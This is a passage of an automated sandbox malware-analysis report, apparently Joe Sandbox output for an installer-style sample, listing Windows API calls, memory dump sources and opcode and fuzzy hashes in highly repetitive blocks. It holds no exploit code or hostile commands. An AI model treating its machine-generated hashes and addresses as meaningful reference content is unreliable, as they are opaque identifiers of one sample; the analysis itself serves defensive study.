                                                    • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                    • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 00405E9D
                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CountFileNameTempTick
                                                    • String ID: nsa
                                                    • API String ID: 1716503409-2209301699
                                                    • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                    • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                    • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                    • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                    APIs
                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                    • String ID: HideWindow
                                                    • API String ID: 1249568736-780306582
                                                    • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                    • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                    • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                    • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                    • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                    • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                    • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                    • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                    • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                    • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                    • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                    • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                    • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                    • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                    • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                    • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                    • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                    • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                    • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                    • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                    • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                    • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                    APIs
                                                    • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                    • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocFree
                                                    • String ID:
                                                    • API String ID: 3394109436-0
                                                    • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                    • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                    • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                    • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                    APIs
                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                    • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                    • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                    • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesCreate
                                                    • String ID:
                                                    • API String ID: 415043291-0
                                                    • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                    • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                    • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                    • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                    • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                    • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                    • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                    APIs
                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                    • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                    • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                    • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                    APIs
                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                    • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                    • String ID:
                                                    • API String ID: 4115351271-0
                                                    • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                    • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                    • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                    • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                    APIs
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                    • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                    • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                    • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
